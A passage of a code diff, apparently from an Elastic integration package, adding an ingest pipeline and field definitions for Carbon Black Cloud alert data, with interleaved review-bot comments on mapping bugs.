target_field: process.entity_id + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.guid + copy_from: process.entity_id + ignore_empty_value: true + - rename: + field: json.process_pid + target_field: process.pid + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.pid + copy_from: process.pid + ignore_empty_value: true + - rename: + field: json.process_sha256 + target_field: process.hash.sha256 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.hash.sha256 + copy_from: process.hash.sha256 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.process.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.process?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.process_md5 + target_field: process.hash.md5 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.hash.md5 + copy_from: process.hash.md5 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.process.hash.md5}}}' + if: ctx.carbon_black_cloud?.alert?.process?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.process_reputation + target_field: carbon_black_cloud.alert.process.reputation + ignore_missing: true + - rename: + field: json.process_effective_reputation + target_field: carbon_black_cloud.alert.process.effective_reputation + ignore_missing: true + - script: + description: Removes complete path from ecs field process.name + lang: painless + if: ctx?.process?.name != null + source: | + ctx.process.name = ctx.process.name.substring(ctx.process.name.lastIndexOf('\\') + 1); + # child process fields + - rename: + field: json.childproc_name + target_field: carbon_black_cloud.alert.childproc.name + ignore_missing: true + - rename: + field: json.childproc_username + target_field: carbon_black_cloud.alert.childproc.username + ignore_missing: true + - 
rename: + field: json.childproc_cmdline + target_field: carbon_black_cloud.alert.childproc.cmdline + ignore_missing: true + - rename: + field: json.childproc_guid + target_field: carbon_black_cloud.alert.childproc.guid + ignore_missing: true + - rename: + field: json.childproc_sha256 + target_field: carbon_black_cloud.alert.childproc.hash.sha256 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.childproc.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.childproc?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.childproc_md5 + target_field: carbon_black_cloud.alert.childproc.hash.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.childproc.hash.md5}}}' + if: ctx.carbon_black_cloud?.alert?.childproc?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.childproc_effective_reputation + target_field: carbon_black_cloud.alert.childproc.effective_reputation + ignore_missing: true + # blocked process fields + - rename: + field: json.blocked_name + target_field: carbon_black_cloud.alert.blocked_process.name + ignore_missing: true + - rename: + field: json.blocked_sha256 + target_field: carbon_black_cloud.alert.blocked_process.hash.sha256 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.blocked_process.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.blocked_process?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.blocked_md5 + target_field: carbon_black_cloud.alert.blocked_process.hash.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.blocked_process.hash.md5}}}' + if: ctx.carbon_black_cloud?.alert?.blocked_process?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.blocked_effective_reputation + 
target_field: carbon_black_cloud.alert.blocked_process.effective_reputation + ignore_missing: true + # ioc fields + - rename: + field: json.ioc_field + target_field: carbon_black_cloud.alert.ioc.field + ignore_missing: true + - rename: + field: json.ioc_hit + target_field: carbon_black_cloud.alert.ioc.hit + ignore_missing: true + - rename: + field: json.ioc_id + target_field: carbon_black_cloud.alert.ioc.id + ignore_missing: true + # report fields + - foreach: + field: json.report_tags + if: ctx.json?.report_tags instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.report.tags + value: '{{{_ingest._value}}}' + allow_duplicates: false + - rename: + field: json.report_id + target_field: carbon_black_cloud.alert.report.id + ignore_missing: true + - rename: + field: json.report_name + target_field: carbon_black_cloud.alert.report.name + ignore_missing: true + - rename: + field: json.report_description + target_field: carbon_black_cloud.alert.report.description + ignore_missing: true + - rename: + field: json.report_link + target_field: carbon_black_cloud.alert.report.link + ignore_missing: true + # device fields + - rename: + field: json.device_location + target_field: carbon_black_cloud.alert.device.location + ignore_missing: true + - rename: + field: json.device_os + target_field: carbon_black_cloud.alert.device.os + ignore_missing: true + - rename: + field: json.device_policy_id + target_field: carbon_black_cloud.alert.device.policy_id + ignore_missing: true + - rename: + field: json.device_policy + target_field: carbon_black_cloud.alert.device.policy + ignore_missing: true + - rename: + field: json.device_target_value + target_field: carbon_black_cloud.alert.device.target_value + ignore_missing: true + - rename: + field: json.device_external_ip + target_field: carbon_black_cloud.alert.device.external_ip + ignore_missing: true + - rename: + field: json.device_internal_ip + target_field: 
carbon_black_cloud.alert.device.internal_ip + ignore_missing: true + - rename: + field: json.device_uem_id + target_field: carbon_black_cloud.alert.device.uem_id + ignore_missing: true + # workflow fields + - rename: + field: json.workflow + target_field: carbon_black_cloud.alert.workflow + ignore_missing: true + - date: + field: carbon_black_cloud.alert.workflow.change_timestamp + target_field: carbon_black_cloud.alert.workflow.change_timestamp + if: ctx.carbon_black_cloud?.alert?.workflow?.change_timestamp != null && ctx.carbon_black_cloud.alert.workflow.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.workflow.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + # determination fields + - rename: + field: json.determination + target_field: carbon_black_cloud.alert.determination + ignore_missing: true + - date: + field: carbon_black_cloud.alert.determination.change_timestamp + target_field: carbon_black_cloud.alert.determination.change_timestamp + if: ctx.carbon_black_cloud?.alert?.determination?.change_timestamp != null && ctx.carbon_black_cloud.alert.determination.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.determination.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + # mdr fields + - convert: + field: json.mdr_alert + target_field: carbon_black_cloud.alert.mdr.alert + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.mdr_alert + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' + - convert: + field: json.mdr_alert_notes_present + target_field: carbon_black_cloud.alert.mdr.alert_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.mdr_alert_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.mdr_threat_notes_present + target_field: carbon_black_cloud.alert.mdr.threat_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.mdr_threat_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.mdr_determination + target_field: carbon_black_cloud.alert.mdr.determination + ignore_missing: true + - date: + field: carbon_black_cloud.alert.mdr.determination.change_timestamp + target_field: carbon_black_cloud.alert.mdr.determination.change_timestamp + if: ctx.carbon_black_cloud?.alert?.mdr?.determination?.change_timestamp != null && ctx.carbon_black_cloud.alert.mdr.determination.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.mdr.determination.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.mdr_workflow + target_field: carbon_black_cloud.alert.mdr.workflow + ignore_missing: true + - date: + field: carbon_black_cloud.alert.mdr.workflow.change_timestamp + target_field: carbon_black_cloud.alert.mdr.workflow.change_timestamp + if: ctx.carbon_black_cloud?.alert?.mdr?.workflow?.change_timestamp != null && 
ctx.carbon_black_cloud.alert.mdr.workflow.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.mdr.workflow.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.mdr_classification + target_field: carbon_black_cloud.alert.mdr.classification + ignore_missing: true + - date: + field: carbon_black_cloud.alert.mdr.classification.change_timestamp + target_field: carbon_black_cloud.alert.mdr.classification.change_timestamp + if: ctx.carbon_black_cloud?.alert?.mdr?.classification?.change_timestamp != null && ctx.carbon_black_cloud.alert.mdr.classification.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.mdr.classification.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + # netconn fields + - convert: + field: json.netconn_remote_port + target_field: carbon_black_cloud.alert.netconn.remote_port + type: integer + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_port + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_port + target_field: carbon_black_cloud.alert.netconn.local_port + type: integer + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_port + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_remote_ip + 
target_field: carbon_black_cloud.alert.netconn.remote_ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_ip + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_ip + target_field: carbon_black_cloud.alert.netconn.local_ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_ip + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_remote_ipv4 + target_field: carbon_black_cloud.alert.netconn.remote_ipv4 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_ipv4 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_ipv4 + target_field: carbon_black_cloud.alert.netconn.local_ipv4 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_ipv4 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_remote_ipv6 + target_field: carbon_black_cloud.alert.netconn.remote_ipv6 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_ipv6 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_ipv6 + target_field: 
carbon_black_cloud.alert.netconn.local_ipv6 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_ipv6 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.netconn_protocol + target_field: carbon_black_cloud.alert.netconn.protocol + ignore_missing: true + - rename: + field: json.netconn_remote_domain + target_field: carbon_black_cloud.alert.netconn.remote_domain + ignore_missing: true + # misc fields + - convert: + field: json.ip_reputation + target_field: carbon_black_cloud.alert.ip_reputation + type: integer + ignore_missing: true + on_failure: + - remove: + field: json.ip_reputation + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.remote_is_private + target_field: carbon_black_cloud.alert.remote_is_private + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.remote_is_private + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: carbon_black_cloud.alert.category + value: 'THREAT' + # cleanup & final additions + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + ignore_missing: true + - remove: + field: + - json.severity + - json.detection_timestamp + - json.backend_timestamp + - json.backend_update_timestamp + - json.user_update_timestamp + - json.first_event_timestamp + - json.last_event_timestamp + - json.device_id + - json.alert_notes_present + - json.threat_notes_present + - json.additional_events_present + - 
json.netconn_remote_port + - json.netconn_local_port + - json.netconn_remote_ip + - json.netconn_local_ip + - json.netconn_remote_ipv4 + - json.netconn_local_ipv4 + - json.netconn_remote_ipv6 + - json.netconn_local_ipv6 + - json.mdr_classification?.determination + - json.ml_classification_anomalies + - json.ip_reputation + - json.remote_is_private + - json.mdr_alert + - json.mdr_alert_notes_present + - json.mdr_threat_notes_present + - json.process_issuer + - json.process_publisher + - json.report_tags + ignore_missing: true + - script: + description: Adds all the remaining fields in fields under carbon_black_cloud.alert. + lang: painless + if: ctx.json != null + source: | + for (Map.Entry m : ctx.json.entrySet()) { + ctx.carbon_black_cloud.alert[m.getKey()] = m.getValue(); + } + - remove: + field: json + ignore_missing: true + - script: + description: Drops null/empty values recursively. + lang: painless + source: | + boolean dropEmptyFields(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/agent.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/agent.yml new file mode 100644 index 00000000000..bf2dfff6756 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/agent.yml 
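Review bot: The final `remove` list drops the raw `json.*` copies of fields that earlier `foreach` processors already appended, but `json.ttps` and `json.threat_category` are not in it, so the catch-all Painless script that copies every remaining `json` entry under `carbon_black_cloud.alert` overwrites the de-duplicated `ttps` and `threat_category` lists with the raw values. Add `- json.ttps` and `- json.threat_category` to that list next to `- json.ml_classification_anomalies`. The entry `- json.mdr_classification?.determination` in the same list is not a valid field path (the `?.` is taken literally) and `json.mdr_classification` has already been renamed to `carbon_black_cloud.alert.mdr.classification` by that point, so the entry is dead and can be dropped. Separately, the grok on `host.hostname` captures the `DOMAIN\` prefix into `user.domain` rather than `host.domain`; if this mirrors the existing alert pipeline it may be deliberate, but a one-line comment saying so would help the next maintainer.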
@@ -0,0 +1,171 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. 
+ example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/base-fields.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/base-fields.yml new file mode 100644 index 00000000000..b0dd32372c4 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.module + type: constant_keyword + description: Event module. + value: carbon_black_cloud +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: carbon_black_cloud.alert_v7 
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/ecs.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/ecs.yml
new file mode 100644
index 00000000000..397d0af5c9e
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/ecs.yml
@@ -0,0 +1,58 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: event.created
+- external: ecs
+ name: event.end
+- external: ecs
+ name: event.id
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.reason
+- external: ecs
+ name: event.severity
+- external: ecs
+ name: event.start
+- external: ecs
+ name: process.entity_id
+- external: ecs
+ name: process.executable
+- external: ecs
+ name: process.name
+- external: ecs
+ name: process.command_line
+- external: ecs
+ name: process.pid
+- external: ecs
+ name: process.hash.sha256
+- external: ecs
+ name: process.hash.md5
+- external: ecs
+ name: process.parent.entity_id
+- external: ecs
+ name: process.parent.executable
+- external: ecs
+ name: process.parent.name
+- external: ecs
+ name: process.parent.command_line
+- external: ecs
+ name: process.parent.pid
+- external: ecs
+ name: process.parent.hash.sha256
+- external: ecs
+ name: process.parent.hash.md5
+- external: ecs
+ name: related.hash
+- external: ecs
+ name: related.hosts
+- external: ecs
+ name: related.user
+- external: ecs
+ name: tags
+- external: ecs
+ name: user.domain
+- external: ecs
+ name: user.name
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/fields.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/fields.yml
new file mode 100644
index 00000000000..2534a8cb08e
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/fields.yml
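Review bot: `error.message` is not declared in ecs.yml although the pipeline's `on_failure` handlers append to it on every conversion failure and in the pipeline-level handler, so documents that take the failure path would carry an unmapped field unless the package imports ECS mappings another way (for example an ECS import setting in the build manifest, which is not visible here). Adding `- external: ecs` / `name: error.message` keeps the failure path searchable, which matters for detecting silently broken ingestion. The same check applies to any `event.category`, `event.type` or `event.action` values set in the part of the pipeline that precedes this chunk.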
@@ -0,0 +1,493 @@ +- name: carbon_black_cloud.alert + type: group + fields: + - name: category + type: keyword + description: The category of the alert. + - name: version + type: keyword + description: The version of the schema being emitted. + - name: url + type: keyword + description: Link to the alerts page for this alert. Does not vary by alert type. + - name: backend_timestamp + type: date + description: Timestamp when the alert was first detected by the Carbon Black Cloud backend, it is a ISO 8601 UTC timestamp. + - name: backend_update_timestamp + type: date + description: The last time the alert was updated in Carbon Black Cloud, it is a ISO 8601 UTC timestamp. + - name: user_update_timestamp + type: date + description: Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination, it is a ISO 8601 UTC timestamp. + - name: additional_events_present + type: boolean + description: Indicator to let API and forwarder users know that they should look up other associated events related to this alert. + - name: alert_notes_present + type: boolean + description: Indicates if notes are associated with the alert. + - name: threat_notes_present + type: boolean + description: Indicates if notes are associated with the threat_id. + - name: organization_key + type: keyword + description: The unique identifier for the organization associated with the alert. + - name: org_feature_entitlement + type: keyword + description: The feature entitlement of the organization. + - name: policy_applied + type: keyword + description: Whether a policy was applied. + - name: product_id + type: keyword + description: The hexadecimal id of the USB device's product. + - name: product_name + type: keyword + description: The name of the USB device's vendor. + - name: reason + type: keyword + description: A spoken language written explanation of the what and why the alert occurred and any action taken. 
+ - name: reason_code + type: keyword + description: Shorthand enum for the full-text reason. + - name: run_state + type: keyword + description: Whether the threat in the alert ran. + - name: sensor_action + type: keyword + description: The action taken by the sensor, according to the rule of the policy. + - name: serial_number + type: keyword + description: The serial number of the USB device. + - name: status + type: keyword + description: status of alert. + - name: tags + type: keyword + description: Tags associated with the alert. + - name: primary_event_id + type: keyword + description: ID of the primary event in the alert. + - name: threat_id + type: keyword + description: The identifier of a threat which this alert belongs. Threats are comprised of a combination of factors that can be repeated across devices. + - name: threat_name + type: keyword + description: Name of the threat. + - name: threat_category + type: keyword + description: Categories of threats which we were able to take action on. + - name: type + type: keyword + description: Type of alert. + - name: vendor_id + type: keyword + description: The hexadecimal id of the USB device's vendor. + - name: vendor_name + type: keyword + description: The name of the USB device's vendor. + - name: ttps + type: keyword + description: Other potential malicious activities involved in a threat. + - name: is_updated + type: boolean + description: Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. + - name: attack_tactic + type: keyword + description: S tactic from the MITRE ATT&CK framework. + - name: attack_technique + type: keyword + description: Technique from the MITRE ATT&CK framework. + # ml_classification fields + - name: ml_classification_final_verdict + type: keyword + description: Final verdict of the alert, based on the ML models that were used to make the prediction. 
+ - name: ml_classification_global_prevalence + type: keyword + description: Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. + - name: ml_classification_org_prevalence + type: keyword + description: TCategories (low/medium/high) used to describe the prevalence of alerts within an organization. + - name: ml_classification_anomalies + type: keyword + description: An list of anomalies detected by the machine learning classification. + # rule fields + - name: rule_id + type: keyword + description: ID of the rule that triggered an alert. + - name: rule_category_id + type: keyword + description: ID representing the category of the rule_id for certain alert types. + - name: rule_config_id + type: keyword + description: ID of the rule configuration that triggered an alert. + - name: rule_config_name + type: keyword + description: Name of the rule configuration that triggered an alert. + - name: rule_config_type + type: keyword + description: Type of the rule configuration that triggered an alert. + - name: tms_rule_id + type: keyword + description: Threat intrusion detection id. + # container runtime fields + - name: k8s_cluster + type: keyword + description: The Kubernetes cluster associated with the event. + - name: k8s_namespace + type: keyword + description: The Kubernetes namespace associated with the event. + - name: k8s_kind + type: keyword + description: The type of Kubernetes resource associated with the event (e.g., Pod, DaemonSet). + - name: k8s_workload_name + type: keyword + description: The name of the Kubernetes workload associated with the event. + - name: k8s_pod_name + type: keyword + description: The name of the Kubernetes pod associated with the event. + - name: k8s_policy_id + type: keyword + description: The unique identifier of the Kubernetes policy associated with the event. + - name: k8s_policy + type: keyword + description: The name of the Kubernetes policy associated with the event. 
+ - name: k8s_rule_id + type: keyword + description: The unique identifier of the Kubernetes rule associated with the event. + - name: k8s_rule + type: keyword + description: The name of the Kubernetes rule associated with the event. + - name: connection_type + type: keyword + description: The type of network connection (e.g., EGRESS, INGRESS). + - name: egress_group_id + type: keyword + description: The unique identifier of the egress group associated with the event. + - name: egress_group_name + type: keyword + description: The name of the egress group associated with the event. + - name: ip_reputation + type: integer + description: The reputation score of the IP address associated with the event. + - name: remote_is_private + type: boolean + description: Indicates whether the remote IP address is private or not. + # device fields + - name: device + type: group + fields: + - name: location + type: keyword + description: Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix. + - name: os + type: keyword + description: OS of the device. + - name: policy_id + type: integer + description: The identifier for the device policy associated with the device at the time of the alert. + - name: policy + type: keyword + description: The name of the device policy associated with the device at the time of the alert. + - name: target_value + type: keyword + description: Target value assigned to the device, set from the policy. + - name: external_ip + type: keyword + description: IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT. + - name: internal_ip + type: keyword + description: IP address of the endpoint reported by the sensor. + - name: uem_id + type: keyword + description: Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function. 
+ # ioc fields + - name: ioc + type: group + fields: + - name: field + type: keyword + description: The field the indicator of comprise (IOC) hit contains. + - name: hit + type: keyword + description: IOC field value or IOC query that matches. + - name: id + type: keyword + description: The identifier of the IOC that cause the hit. + # report fields + - name: report + type: group + fields: + - name: id + type: keyword + description: The identifier of the report that contains the IOC. + - name: name + type: keyword + description: The name of the report that contains the IOC. + - name: description + type: keyword + description: Description of the IOC report associated with the alert. + - name: link + type: keyword + description: Link of reports that contained the IOC that caused a hit. + - name: tags + type: keyword + description: Tags associated with the IOC report. + # parent process fields + - name: parent + type: group + description: Fields related to the parent information. + fields: + - name: hash + type: group + description: Hash values associated with the parent process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the parent process. + - name: md5 + type: keyword + description: MD5 hash of the parent process. + - name: pid + type: long + description: PID of the parent process that has fired the alert. + - name: guid + type: keyword + description: Guid of the parent process that has fired the alert. + - name: name + type: keyword + description: Filesystem path of the parent process binary. + - name: cmdline + type: keyword + description: Command line executed by the parent process. + - name: username + type: keyword + description: User context in which the parent process was executed. + - name: effective_reputation + type: keyword + description: Effective reputation of the parent hash. + - name: reputation + type: keyword + description: Reputation of the parent process; applied when event is processed by the Carbon Black Cloud. 
+ # process fields + - name: process + type: group + description: Fields related to the actor process information. + fields: + - name: hash + type: group + description: Hash values associated with the process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the process. + - name: md5 + type: keyword + description: MD5 hash of the process. + - name: pid + type: long + description: PID of the process that has fired the alert. + - name: guid + type: keyword + description: Guid of the process that has fired the alert. + - name: name + type: keyword + description: Filesystem path of the actor process binary. + - name: cmdline + type: keyword + description: Command line executed by the actor process. + - name: username + type: keyword + description: User context in which the actor process was executed. + - name: effective_reputation + type: keyword + description: Effective reputation of the actor hash. + - name: reputation + type: keyword + description: Reputation of the actor process; applied when event is processed by the Carbon Black Cloud. + - name: issuer + type: keyword + description: The certificate authority associated with the process's certificate. + - name: publisher + type: keyword + description: Publisher name on the certificate used to sign the Windows or macOS process binary. + # child process fields + - name: childproc + type: group + description: Fields related to the child process information. + fields: + - name: hash + type: group + description: Hash values associated with the child process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the child process. + - name: md5 + type: keyword + description: MD5 hash of the child process. + - name: guid + type: keyword + description: Guid of the child process that has fired the alert. + - name: name + type: keyword + description: Filesystem path of the child process binary. 
